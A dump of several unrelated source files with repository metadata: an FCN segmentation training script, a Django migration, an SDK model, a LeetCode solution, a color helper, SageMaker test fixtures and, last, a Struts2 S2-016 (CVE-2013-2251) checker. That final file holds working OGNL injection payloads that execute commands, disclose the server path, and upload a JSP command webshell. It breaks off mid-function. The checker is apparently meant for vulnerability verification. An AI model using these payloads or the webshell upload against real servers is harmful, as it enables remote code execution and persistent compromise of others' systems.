blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
65235dd521308b51b04aee202f4a2e28bd864484 | 2a5d8aafddf6744b8ec5a025a1b908878a56d59d | /examples/voc/train_fcn16s.py | 9c935715746c66f95eccf3a69ac092c5df8fd147 | [] | no_license | mrteera/pytorch-fcn | 030e50657b48a4d43d02c8f0b1020ba15248b3db | 449f92a26beb6bbd423e6fefce896ec96c944e16 | refs/heads/master | 2021-08-20T02:32:48.063375 | 2017-11-28T01:23:12 | 2017-11-28T01:23:12 | 112,288,341 | 2 | 0 | null | 2017-11-28T05:05:08 | 2017-11-28T05:05:08 | null | UTF-8 | Python | false | false | 3,067 | py | #!/usr/bin/env python
import argparse
import os
import os.path as osp
import torch
import torchfcn
from train_fcn32s import get_log_dir
from train_fcn32s import get_parameters
# Training hyper-parameter presets, keyed by the integer passed via -c/--config.
configurations = {
    # same configuration as original work
    # https://github.com/shelhamer/fcn.berkeleyvision.org
    1: dict(
        max_iteration=100000,
        lr=1.0e-12,
        momentum=0.99,
        weight_decay=0.0005,
        interval_validate=4000,
        # NOTE: evaluated at import time -- downloads the pretrained
        # FCN32s checkpoint used to warm-start FCN16s.
        fcn32s_pretrained_model=torchfcn.models.FCN32s.download(),
    )
}
here = osp.dirname(osp.abspath(__file__))  # directory containing this script
def main():
    """Train FCN16s for VOC semantic segmentation.

    CLI: -g/--gpu (required GPU id), -c/--config (key into the
    module-level `configurations` dict), --resume (optional checkpoint
    path).  A fresh run is warm-started from a pretrained FCN32s.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-g', '--gpu', type=int, required=True)
    parser.add_argument('-c', '--config', type=int, default=1,
                        choices=configurations.keys())
    parser.add_argument('--resume', help='Checkpoint path')
    args = parser.parse_args()
    gpu = args.gpu
    cfg = configurations[args.config]
    out = get_log_dir('fcn16s', args.config, cfg)
    resume = args.resume
    # Pin the process to the requested GPU and fix RNG seeds so runs are
    # reproducible.
    os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu)
    cuda = torch.cuda.is_available()
    torch.manual_seed(1337)
    if cuda:
        torch.cuda.manual_seed(1337)
    # 1. dataset: SBD for training, VOC2011 "seg11valid" split for validation.
    root = osp.expanduser('~/data/datasets')
    kwargs = {'num_workers': 4, 'pin_memory': True} if cuda else {}
    train_loader = torch.utils.data.DataLoader(
        torchfcn.datasets.SBDClassSeg(root, split='train', transform=True),
        batch_size=1, shuffle=True, **kwargs)
    val_loader = torch.utils.data.DataLoader(
        torchfcn.datasets.VOC2011ClassSeg(
            root, split='seg11valid', transform=True),
        batch_size=1, shuffle=False, **kwargs)
    # 2. model
    model = torchfcn.models.FCN16s(n_class=21)
    start_epoch = 0
    start_iteration = 0
    if resume:
        # Resume model weights and progress counters from a checkpoint.
        checkpoint = torch.load(resume)
        model.load_state_dict(checkpoint['model_state_dict'])
        start_epoch = checkpoint['epoch']
        start_iteration = checkpoint['iteration']
    else:
        # Fresh run: copy weights from the pretrained FCN32s model.
        fcn32s = torchfcn.models.FCN32s()
        fcn32s.load_state_dict(torch.load(cfg['fcn32s_pretrained_model']))
        model.copy_params_from_fcn32s(fcn32s)
    if cuda:
        model = model.cuda()
    # 3. optimizer: bias parameters get a doubled learning rate and no
    # weight decay (separate SGD parameter group).
    optim = torch.optim.SGD(
        [
            {'params': get_parameters(model, bias=False)},
            {'params': get_parameters(model, bias=True),
             'lr': cfg['lr'] * 2, 'weight_decay': 0},
        ],
        lr=cfg['lr'],
        momentum=cfg['momentum'],
        weight_decay=cfg['weight_decay'])
    if resume:
        optim.load_state_dict(checkpoint['optim_state_dict'])
    trainer = torchfcn.Trainer(
        cuda=cuda,
        model=model,
        optimizer=optim,
        train_loader=train_loader,
        val_loader=val_loader,
        out=out,
        max_iter=cfg['max_iteration'],
        interval_validate=cfg.get('interval_validate', len(train_loader)),
    )
    # Restore progress counters (both 0 for a fresh run) and train.
    trainer.epoch = start_epoch
    trainer.iteration = start_iteration
    trainer.train()
if __name__ == '__main__':
main()
| [
"www.kentaro.wada@gmail.com"
] | www.kentaro.wada@gmail.com |
cc835a2e423f86342cc8680a183f393ecf36c646 | 78a15793be1ba71ea7eecee33abef4ecbe11d8f2 | /apps/tasks/migrations/0007_task_prototype.py | 8aaf0c000b7bb98be1e6a4e5e5a008f2ba9330e0 | [] | no_license | teresaylin/my2009 | f5df9c62492d4c88931f6aa45af31ee88dbe3a1a | 2486750ad73df313d596497b0eb7f4c47518e6a6 | refs/heads/master | 2021-03-21T23:53:55.581074 | 2016-06-01T18:13:44 | 2016-06-01T18:13:44 | 23,392,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated Django migration: adds an optional, self-referential
    `prototype` foreign key to Task, recording which task this one was
    cloned from (reverse accessor: `prototype_for`)."""
    dependencies = [
        ('tasks', '0006_auto_20150112_1549'),
    ]
    operations = [
        migrations.AddField(
            model_name='task',
            name='prototype',
            # blank/null: the field is optional both in forms and in the DB.
            field=models.ForeignKey(blank=True, null=True, to='tasks.Task', related_name='prototype_for'),
            preserve_default=True,
        ),
    ]
| [
"jam.hann@gmail.com"
] | jam.hann@gmail.com |
bc5605235c47c590538bf12a1da25091b2f5baa9 | fc1c1e88a191b47f745625688d33555901fd8e9a | /meraki_sdk/models/update_network_switch_link_aggregation_model.py | ae44c5120556a9d79b3eaa75edadd21fd9fcaf0c | [
"MIT",
"Python-2.0"
] | permissive | RaulCatalano/meraki-python-sdk | 9161673cfd715d147e0a6ddb556d9c9913e06580 | 9894089eb013318243ae48869cc5130eb37f80c0 | refs/heads/master | 2022-04-02T08:36:03.907147 | 2020-02-03T19:24:04 | 2020-02-03T19:24:04 | 416,889,849 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,722 | py | # -*- coding: utf-8 -*-
"""
meraki_sdk
This file was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ).
"""
import meraki_sdk.models.switch_port_model
import meraki_sdk.models.switch_profile_port_model
class UpdateNetworkSwitchLinkAggregationModel(object):

    """Implementation of the 'updateNetworkSwitchLinkAggregation' model.

    Request body for updating a switch link-aggregation group.

    Attributes:
        switch_ports (list of SwitchPortModel): Array of switch or stack ports
            for updating aggregation group. Minimum 2 and maximum 8 ports are
            supported.
        switch_profile_ports (list of SwitchProfilePortModel): Array of switch
            profile ports for updating aggregation group. Minimum 2 and
            maximum 8 ports are supported.

    """

    # Mapping from Model property names to API (JSON) property names.
    _names = {
        "switch_ports":'switchPorts',
        "switch_profile_ports":'switchProfilePorts'
    }

    def __init__(self,
                 switch_ports=None,
                 switch_profile_ports=None):
        """Constructor for the UpdateNetworkSwitchLinkAggregationModel class"""

        # Initialize members of the class
        self.switch_ports = switch_ports
        self.switch_profile_ports = switch_profile_ports

    @classmethod
    def from_dictionary(cls,
                        dictionary):
        """Creates an instance of this model from a dictionary

        Args:
            dictionary (dictionary): A dictionary representation of the object as
            obtained from the deserialization of the server's response. The keys
            MUST match property names in the API description.

        Returns:
            object: An instance of this structure class, or None when
            `dictionary` is None.

        """
        if dictionary is None:
            return None

        # Extract variables from the dictionary.  Use `is not None` (PEP 8)
        # so a missing key yields None while an empty list stays a list.
        switch_ports = None
        if dictionary.get('switchPorts') is not None:
            switch_ports = [
                meraki_sdk.models.switch_port_model.SwitchPortModel.from_dictionary(structure)
                for structure in dictionary.get('switchPorts')
            ]
        switch_profile_ports = None
        if dictionary.get('switchProfilePorts') is not None:
            switch_profile_ports = [
                meraki_sdk.models.switch_profile_port_model.SwitchProfilePortModel.from_dictionary(structure)
                for structure in dictionary.get('switchProfilePorts')
            ]

        # Return an object of this model
        return cls(switch_ports,
                   switch_profile_ports)
| [
"api-pm@meraki.com"
] | api-pm@meraki.com |
c1cc6d515458baffe471b2ce6885e3399146a037 | b095173b2dbc77c8ad61c42403258c76169b7a63 | /tests/unit/sagemaker/feature_store/feature_processor/test_data_helpers.py | a539c1b8d0e12b36adf3caff9af1e6c6a5a997de | [
"Apache-2.0"
] | permissive | aws/sagemaker-python-sdk | 666665e717cfb76698ba3ea7563b45344634264d | 8d5d7fd8ae1a917ed3e2b988d5e533bce244fd85 | refs/heads/master | 2023-09-04T01:00:20.663626 | 2023-08-31T15:29:19 | 2023-08-31T15:29:19 | 110,621,895 | 2,050 | 1,255 | Apache-2.0 | 2023-09-14T17:37:15 | 2017-11-14T01:03:33 | Python | UTF-8 | Python | false | false | 5,596 | py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import datetime
import json
from dateutil.tz import tzlocal
from sagemaker.feature_store.feature_processor._data_source import (
CSVDataSource,
FeatureGroupDataSource,
)
from sagemaker.feature_store.feature_processor._enums import FeatureProcessorMode
from sagemaker.feature_store.feature_processor._feature_processor_config import (
FeatureProcessorConfig,
)
INPUT_S3_URI = "s3://bucket/prefix/"
INPUT_FEATURE_GROUP_NAME = "input-fg"
INPUT_FEATURE_GROUP_ARN = "arn:aws:sagemaker:us-west-2:12345789012:feature-group/input-fg"
INPUT_FEATURE_GROUP_S3_URI = "s3://bucket/input-fg/"
INPUT_FEATURE_GROUP_RESOLVED_OUTPUT_S3_URI = (
"s3://bucket/input-fg/feature-store/12345789012/"
"sagemaker/us-west-2/offline-store/input-fg-12345/data"
)
FEATURE_GROUP_DATA_SOURCE = FeatureGroupDataSource(name=INPUT_FEATURE_GROUP_ARN)
S3_DATA_SOURCE = CSVDataSource(s3_uri=INPUT_S3_URI)
FEATURE_PROCESSOR_INPUTS = [FEATURE_GROUP_DATA_SOURCE, S3_DATA_SOURCE]
OUTPUT_FEATURE_GROUP_ARN = "arn:aws:sagemaker:us-west-2:12345789012:feature-group/output-fg"
FEATURE_GROUP_SYSTEM_PARAMS = {
"feature_group_name": "input-fg",
"online_store_enabled": True,
"offline_store_enabled": False,
"offline_store_resolved_s3_uri": None,
}
SYSTEM_PARAMS = {"system": {"scheduled_time": "2023-03-25T02:01:26Z"}}
USER_INPUT_PARAMS = {
"some-key": "some-value",
"some-other-key": {"some-key": "some-value"},
}
DESCRIBE_FEATURE_GROUP_RESPONSE = {
"FeatureGroupArn": INPUT_FEATURE_GROUP_ARN,
"FeatureGroupName": INPUT_FEATURE_GROUP_NAME,
"RecordIdentifierFeatureName": "id",
"EventTimeFeatureName": "ingest_time",
"FeatureDefinitions": [
{"FeatureName": "id", "FeatureType": "String"},
{"FeatureName": "model", "FeatureType": "String"},
{"FeatureName": "model_year", "FeatureType": "String"},
{"FeatureName": "status", "FeatureType": "String"},
{"FeatureName": "mileage", "FeatureType": "String"},
{"FeatureName": "price", "FeatureType": "String"},
{"FeatureName": "msrp", "FeatureType": "String"},
{"FeatureName": "ingest_time", "FeatureType": "Fractional"},
],
"CreationTime": datetime.datetime(2023, 3, 29, 19, 15, 47, 20000, tzinfo=tzlocal()),
"OnlineStoreConfig": {"EnableOnlineStore": True},
"OfflineStoreConfig": {
"S3StorageConfig": {
"S3Uri": INPUT_FEATURE_GROUP_S3_URI,
"ResolvedOutputS3Uri": INPUT_FEATURE_GROUP_RESOLVED_OUTPUT_S3_URI,
},
"DisableGlueTableCreation": False,
"DataCatalogConfig": {
"TableName": "input_fg_1680142547",
"Catalog": "AwsDataCatalog",
"Database": "sagemaker_featurestore",
},
},
"RoleArn": "arn:aws:iam::12345789012:role/role-name",
"FeatureGroupStatus": "Created",
"OnlineStoreTotalSizeBytes": 12345,
"ResponseMetadata": {
"RequestId": "d36d3647-1632-4f4e-9f7c-2a4e38e4c6f8",
"HTTPStatusCode": 200,
"HTTPHeaders": {
"x-amzn-requestid": "d36d3647-1632-4f4e-9f7c-2a4e38e4c6f8",
"content-type": "application/x-amz-json-1.1",
"content-length": "1311",
"date": "Fri, 31 Mar 2023 01:05:49 GMT",
},
"RetryAttempts": 0,
},
}
PIPELINE = {
"PipelineArn": "some_pipeline_arn",
"RoleArn": "some_execution_role_arn",
"CreationTime": datetime.datetime(2023, 3, 29, 19, 15, 47, 20000, tzinfo=tzlocal()),
"PipelineDefinition": json.dumps(
{
"Steps": [
{
"RetryPolicies": [
{
"BackoffRate": 2.0,
"IntervalSeconds": 1,
"MaxAttempts": 5,
"ExceptionType": ["Step.SERVICE_FAULT", "Step.THROTTLING"],
},
{
"BackoffRate": 2.0,
"IntervalSeconds": 1,
"MaxAttempts": 5,
"ExceptionType": [
"SageMaker.JOB_INTERNAL_ERROR",
"SageMaker.CAPACITY_ERROR",
"SageMaker.RESOURCE_LIMIT",
],
},
]
}
]
}
),
}
def create_fp_config(
    inputs=None,
    output=OUTPUT_FEATURE_GROUP_ARN,
    mode=FeatureProcessorMode.PYSPARK,
    target_stores=None,
    enable_ingestion=True,
    parameters=None,
):
    """Helper method to create a FeatureProcessorConfig with fewer arguments.

    Note: `inputs or FEATURE_PROCESSOR_INPUTS` means any falsy value
    (None or an empty list) falls back to the module-level fixture.
    """
    return FeatureProcessorConfig.create(
        inputs=inputs or FEATURE_PROCESSOR_INPUTS,
        output=output,
        mode=mode,
        target_stores=target_stores,
        enable_ingestion=enable_ingestion,
        parameters=parameters,
    )
| [
"noreply@github.com"
] | aws.noreply@github.com |
c8dcd1cedd1d97b890b8d2a3f6acf93613e18b7a | 09df89395816834ddf77de620f959c22e74d8c00 | /HashTable/IntersectionOfTwoArrays.py | c9236cc4818230a0b857c950f279ebbd7dea479b | [] | no_license | gdh756462786/Leetcode_by_python | c853c4e3de255a8b4016c59944a0d40213a539a7 | 6387543a2a23c30aef1d5d37db54ca72cfb19270 | refs/heads/master | 2020-06-22T11:53:24.758506 | 2018-12-28T03:03:31 | 2018-12-28T03:03:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | # -*- coding: utf-8 -*-
'''
Given two arrays, write a function to compute their intersection.
Example:
Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2, 2].
'''
class Solution(object):
    def intersect(self, nums1, nums2):
        """Return the multiset intersection of two integer arrays.

        Each element appears as many times as it occurs in both inputs
        (order of the result is unspecified, per the problem statement).

        Fixes over the original two-pointer version: the inputs are no
        longer mutated (the original popped elements off both lists),
        and the repeated `list.pop(0)` calls — O(n) each, O(n^2) overall
        — are replaced with a Counter-based O(n + m) pass.

        :type nums1: List[int]
        :type nums2: List[int]
        :rtype: List[int]
        """
        import collections
        remaining = collections.Counter(nums1)
        result = []
        for value in nums2:
            # Emit `value` only while copies from nums1 are still unused.
            if remaining[value] > 0:
                remaining[value] -= 1
                result.append(value)
        return result
'''
方法二
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
count = {}
res = []
for item in nums1:
if item not in count:
count[item] = [1, 0]
else:
count[item][0] += 1
for item in nums2:
if item in count:
count[item][1] +=1
for key in count:
if count[key][0] * count[key][1] > 0:
for i in range(min(count[key][0], count[key][1])):
res.append(key)
return res
'''
'''
Test:
nums1 = [1,2,2,1]
nums2 = [2,2]
'''
solution = Solution()
nums1 = [1,2,2,1]
nums2 = [2,2]
res = solution.intersect(nums1, nums2)
print res | [
"pengshuang92@163.com"
] | pengshuang92@163.com |
e2b08af0cf472fba90e20de63c2f33fe20f598d9 | 2a45af8ec8a4c87d544f461d27795a283f8f5f67 | /python/termcolor.py | d653691bc187a1bbfe10735a28e6d377d5049fb5 | [] | no_license | fengidri/python-script | 2199a16a2d0cc76e6055aec31aaced4638a8c86d | 28fb8e6dbf9e6ba5a1f9c4c3d7b635212bfc5b66 | refs/heads/master | 2020-04-05T14:04:55.103302 | 2017-04-27T10:32:27 | 2017-04-27T10:32:27 | 8,678,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,235 | py | class termcolor:
    def __init__(self):
        # ANSI coloring is enabled by default; off() disables it.
        self.color_switch = True
    def on(self):
        # Enable ANSI color output.
        self.color_switch = True
    def off(self):
        # Disable ANSI color output; color methods then return text unchanged.
        self.color_switch = False
def black(self,s): return self.__color(30, s)
def red(self,s): return self.__color(31, s)
def green(self,s): return self.__color(32, s)
def yellow(self,s): return self.__color(33, s)
def blue(self,s): return self.__color(34, s)
def purple(self,s): return self.__color(35, s)
def white(self,s): return self.__color(37, s)
def __color(self, color_int, s):
if self.color_switch:
return "%s[%d;2m%s%s[0m" %(chr(27), color_int, s, chr(27))
else:
return s
def highlight(self,s):
if self.color_switch:
return "%s[30;2m%s%s[1m"%(chr(27), s, chr(27))
else:
return s
def __color(color_int, s):
    """Wrap `s` in the ANSI escape sequence for foreground color `color_int`."""
    esc = chr(27)
    return "{0}[{1};2m{2}{0}[0m".format(esc, color_int, s)
# Module-level convenience wrappers, one per ANSI foreground color.
def black(s): return __color(30, s)
def red(s): return __color(31, s)
def green(s): return __color(32, s)
def yellow(s): return __color(33, s)
def blue(s): return __color(34, s)
def purple(s): return __color(35, s)
def white(s): return __color(37, s)
| [
"fengidri@gmail.com"
] | fengidri@gmail.com |
1cd7062e2dbbc857e50079a192f844d5b55ed6a5 | 350ecc8259bcad075bd376423335bb41cc8a533e | /container.py | d6f4dabc91f6cd2c71ee5bbf7a890d63b568db65 | [] | no_license | CodedQuen/python_begin | 39da66ecc4a77b94a5afbbf0900727c8156b85e1 | 1433c319b5d85520c50aee00dd4b6f21a7e6366a | refs/heads/master | 2022-06-10T10:30:28.807874 | 2020-04-25T03:34:03 | 2020-04-25T03:34:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 276 | py | class Container(Object):
    # NOTE(review): `Object` (base class) and `abstractmethod` are not
    # defined in this file as shown -- presumably they come from a course
    # framework module; verify the imports in the full project.
    def __init__(self):
        super(Container, self).__init__()
        # Number of items currently held; maintained by subclasses.
        self._count = 0
    def purge(self):
        # Abstract: subclasses must remove all items from the container.
        pass
    purge = abstractmethod(purge)  # pre-decorator-style abstract marker
    def __iter__(self):
        # Abstract: subclasses must return an iterator over their items.
        pass
    __iter__ = abstractmethod(__iter__)
| [
"noreply@github.com"
] | CodedQuen.noreply@github.com |
96324744aa7dddbf82ee6d0e7ad929195f6382f3 | 3db5e39d9bbe1c86229a26e7d19e3ceb37f902e3 | /Baekjoon/DFS/11403_경로찾기.py | 428e02133b0c4846feee49fd309f8023c6f0c0a1 | [] | no_license | sweetrain096/rain-s_python | 5ca2fe5e7f97a681b6e75e64264687a723be1976 | eb285eb50eeebfaa2b4a4d7816314e2073faab00 | refs/heads/master | 2021-07-19T16:06:01.389283 | 2020-05-29T14:56:16 | 2020-05-29T14:56:16 | 162,240,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | import sys
sys.stdin = open("11403_input.txt")
def dfs(node):
    """Depth-first search over the module-level adjacency matrix `graph`,
    marking every node reachable from the start row in `visited`.

    `cnt` is 0 only on the very first call, so the start node itself is
    marked only if it is re-entered through an actual edge (cycle) --
    this yields "is there a path i -> j", not mere connectivity.
    """
    global cnt
    if cnt:
        # Skip marking on the initial call (cnt == 0).
        visited[node] = 1
    cnt += 1
    for i in range(n):  # n, graph, visited are module-level globals
        if graph[node][i] and not visited[i]:
            dfs(i)
n = int(input())
graph = []
for i in range(n):
graph.append(list(map(int, input().split())))
for row in range(n):
visited = [0 for _ in range(n)]
cnt = 0
dfs(row)
print(' '. join(map(str, visited)))
| [
"gpfhddl09@gmail.com"
] | gpfhddl09@gmail.com |
aafa2d25bda177feee0ba3861452ed094d4d6d30 | 80760d4c8a6b2c45b4b529bdd98d33c9c5509438 | /Practice/atcoder/ABC/055/src/c.py | 581f1048d011740a10f93f59ac009b0225db5863 | [] | no_license | prrn-pg/Shojin | f1f46f8df932df0be90082b475ec02b52ddd882e | 3a20f1122d8bf7d95d9ecd205a62fc36168953d2 | refs/heads/master | 2022-12-30T22:26:41.020473 | 2020-10-17T13:53:52 | 2020-10-17T13:53:52 | 93,830,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | # sはありったけ使うほうがいい(cから作るとコストがかかる)
# use as many 's' as possible = m // 2 (building from 'c' costs extra)
# making an 'scc' from the leftover c's takes 4 c's each
n, m = map(int, input().split())
c = min(n, m // 2)
c += max(0, (m-2*n) // 4)
print(c)
| [
"hjod1172@yahoo.co.jp"
] | hjod1172@yahoo.co.jp |
7373d5b736b485909f5bd2f9492763ddb0046a15 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_connivance.py | 4c54eff01815f5dbf6ca736af9a0c9732235da69 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py |
#calss header
class _CONNIVANCE():
    """Word-base entry describing the noun "connivance".

    Holds the dictionary definition plus empty relationship/property
    slots used by the surrounding word-base framework.
    """
    def __init__(self,):
        # Identity and dictionary definition of the word.
        self.name = "CONNIVANCE"
        self.definitions = [
            u'the act of conniving, especially by knowing that something bad is happening and allowing it to continue: '
        ]
        # Relationship and metadata slots start out empty.
        self.parents, self.childen = [], []
        self.properties = []
        self.jsondata = {}
        self.specie = 'nouns'
    def run(self, obj1 = [], obj2 = []):
        """Return the entry's JSON payload; obj1/obj2 are unused."""
        return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
c9781bbdb2daf299479b46c56664e6961bb2de0e | a3d72c9d47a3711ff1a7213da25bacdcb3a7aa32 | /stickerfinder/models/__init__.py | 060f44f521a3886e9ed3f2fb27f318cbfea89f87 | [
"MIT"
] | permissive | crashcoredump/sticker-finder | 225a46c586d1b2b8764cf325e296186cbece5edd | 8158724ebc3e8346012d0ede05a75bb8f9f5f7eb | refs/heads/master | 2020-08-26T23:28:56.991893 | 2019-10-23T22:34:58 | 2019-10-23T22:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | from stickerfinder.models.chat import Chat, chat_sticker_set # noqa
from stickerfinder.models.sticker import Sticker, sticker_tag # noqa
from stickerfinder.models.task import Task # noqa
from stickerfinder.models.sticker_set import StickerSet # noqa
from stickerfinder.models.tag import Tag # noqa
from stickerfinder.models.user import User # noqa
from stickerfinder.models.change import Change, change_added_tags, change_removed_tags # noqa
from stickerfinder.models.report import Report # noqa
from stickerfinder.models.inline_query import InlineQuery # noqa
from stickerfinder.models.inline_query_request import InlineQueryRequest # noqa
from stickerfinder.models.sticker_usages import StickerUsage # noqa
from stickerfinder.models.proposed_tags import ProposedTags # noqa
| [
"arne@twobeer.de"
] | arne@twobeer.de |
db0ceb7dc61955a38e418bdd38b7e2bbb30d7b57 | c3b66b2f374722acda9747e8c0759ec7aed7e367 | /flask/app/plugins/Struts2/S2_016.py | 788428d7ee3f5c29ee61681f8c4b92562e011671 | [] | no_license | LubyRuffy/linbing | 743965f6e658e476da011ae3a91a91c8466ff977 | b9fb2358955f19629b96ae753cd8811e8d89a862 | refs/heads/master | 2021-02-19T18:24:32.890527 | 2020-03-04T06:18:46 | 2020-03-04T06:18:46 | 245,317,758 | 1 | 0 | null | 2020-03-06T03:02:42 | 2020-03-06T03:02:41 | null | UTF-8 | Python | false | false | 6,166 | py | #!/usr/bin/env python3
'''
name: Struts2 S2-016漏洞,又名CVE-2013-2251漏洞
description: Struts2 S2-016漏洞可执行任意命令
'''
import os
import re
import json
import time
import urllib
import string
import random
import requests
from urllib import request, parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class S2_016_BaseVerify:
    """PoC checker for Struts2 S2-016 (CVE-2013-2251).

    Sends OGNL-injection payloads through the `redirect:` action prefix;
    if a random marker string is echoed back, the target is vulnerable.
    Intended for authorized security testing only.
    """
    def __init__(self, url):
        self.url = url
        # Build a random 8-char marker that the probe payload echoes back.
        self.capta=''
        words=''.join((string.ascii_letters,string.digits))
        for i in range(8):
            self.capta = self.capta + random.choice(words)
        self.headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3",
            'Content-Type': "application/x-www-form-urlencoded",
            'Connection': "keep-alive",
        }
        # Probe payload: runs `echo <marker>` on the target via OGNL.
        self.check_payload = '''?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27''' + 'echo' + ' ' + self.capta + '''%27%29.getInputStream%28%29%29%7D'''
        # Executes `whoami` and writes its output into the HTTP response.
        self.cmd_payload = '''?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{'whoami'}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}'''
        # Discloses the webapp's real filesystem root path in the response.
        self.path_payload = '''?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28"%2F"%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'''
        # Minimal JSP command shell uploaded by upload_jspshell().
        self.jsp_payload = """
    <%
    if("cmd".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
    out.println(new String(b));
    }
    out.print("</pre>");
    }
    %>
    """
    def get_pagecode(self, url):
        # Plain GET, ignoring TLS certificate errors; returns the Response.
        req = requests.get(url = url, verify = False)
        return req
    def upload_jspshell(self, url, path):
        # Write self.jsp_payload to <path>/test.jsp on the target through
        # an OGNL file-write payload, then report the shell's URL.
        webshellpath = "'" + path + '/' + "/test.jsp" + "'"
        Headers = {'ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent' : 'Mozilla/5.0 (compatible; Indy Library)'}
        payload = "?redirect:${%23path%3d"
        payload += webshellpath
        payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
        payload += '"' + path + '/test.jsp' + '+Get Shell!!!"'
        payload += "),%23stm.getWriter().flush(),%23stm.getWriter().close()}"
        url += payload
        try:
            # The POST body (the JSP source) is read server-side by the
            # getReader().read(...) call embedded in the payload.
            req = requests.post(url, data = self.jsp_payload, headers = Headers, timeout = 10, allow_redirects = False, verify = False)
            if req.text.find('<html') == -1:
                print('上传webshell文件成功,webshell文件路径为:', self.url.split('/')[0] + '//' + self.url.split('/')[2] + '/test.jsp')
            else:
                return 'Fail.....>_<'
        except Exception as e:
            return str(e)
    def filter(self, check_str):
        # Strip newlines and NUL bytes from an iterable of characters.
        temp = ''
        for i in check_str:
